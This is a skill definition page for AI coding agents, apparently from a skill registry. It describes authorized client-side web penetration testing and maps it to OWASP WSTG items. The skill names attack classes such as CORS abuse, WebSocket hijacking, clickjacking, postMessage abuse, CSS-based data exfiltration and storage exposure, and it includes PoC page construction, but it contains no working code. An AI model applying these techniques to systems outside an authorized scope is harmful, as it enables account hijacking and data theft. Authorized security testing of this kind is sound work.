Skills
skills/jd-opensource/joysafeter/pentest-client-advanced

pentest-client-advanced

SKILL.md

Pentest Client Advanced

Purpose

Test advanced client-side attack surfaces beyond XSS. Six WSTG-CLNT items remain unchecked in Shannon's pipeline — these are distinct attack classes requiring different methodology than taint analysis.

Prerequisites

Authorization Requirements

  • Written authorization with client-side testing scope
  • Test domains for hosting PoC HTML pages (attacker-controlled origin)
  • Browser testing environment with DevTools access
  • Target user simulation — ability to test cross-origin interactions

Environment Setup

  • Modern browser with DevTools (Chrome/Firefox)
  • Burp Suite for intercepting WebSocket and cross-origin traffic
  • Local HTTP server for hosting PoC pages (python -m http.server)
  • Playwright for automated browser-based attack verification

Core Workflow

  1. CORS Misconfiguration: Test reflected Origin in ACAO header, null origin bypass, subdomain wildcard abuse, credential leakage via cross-origin requests (WSTG-CLNT-07).
  2. WebSocket Security: Missing auth on WS upgrade, CSWSH (Cross-Site WebSocket Hijacking), injection through WS messages, missing origin validation (WSTG-CLNT-10).
  3. Clickjacking: Missing X-Frame-Options / CSP frame-ancestors, UI redressing, drag-and-drop hijacking, multi-step clickjacking chains (WSTG-CLNT-09).
  4. postMessage Abuse: Missing origin validation in message handlers, DOM manipulation via cross-origin messages, prototype pollution through postMessage (WSTG-CLNT-11).
  5. CSS Injection: Data exfiltration via CSS attribute selectors + background-image, CSS-based keylogging, style injection for UI manipulation (WSTG-CLNT-05).
  6. Client-Side Storage: Sensitive data in localStorage/sessionStorage, IndexedDB exposure, service worker cache poisoning (WSTG-CLNT-06).
  7. PoC Construction: Build HTML pages demonstrating each attack with real impact.

WSTG Coverage

WSTG ID Test Name Status
WSTG-CLNT-05 CSS Injection
WSTG-CLNT-06 Client-Side Resource Manipulation
WSTG-CLNT-07 Cross-Origin Resource Sharing
WSTG-CLNT-09 Clickjacking
WSTG-CLNT-10 WebSocket Testing
WSTG-CLNT-11 Web Messaging

Tool Categories

Category Tools Purpose
CORS Testing CORScanner, curl, custom PoC pages CORS misconfiguration detection
WebSocket websocket-client (Python), Burp WS WebSocket hijacking and injection
Clickjacking custom HTML iframes, Playwright UI redressing PoC construction
Browser Automation Playwright, Puppeteer Automated client-side attack verification
Storage Analysis Browser DevTools, custom JS localStorage/IndexedDB inspection

References

  • references/tools.md - Tool function signatures and parameters
  • references/workflows.md - Attack pattern definitions and test vectors
Weekly Installs
24
Repository
jd-opensource/joysafeter
GitHub Stars
175
First Seen
Feb 18, 2026
Security Audits
Gen Agent Trust HubWarn
SocketPass
SnykFail
Installed on
gemini-cli24
github-copilot24
codex24
amp24
kimi-cli24
cursor24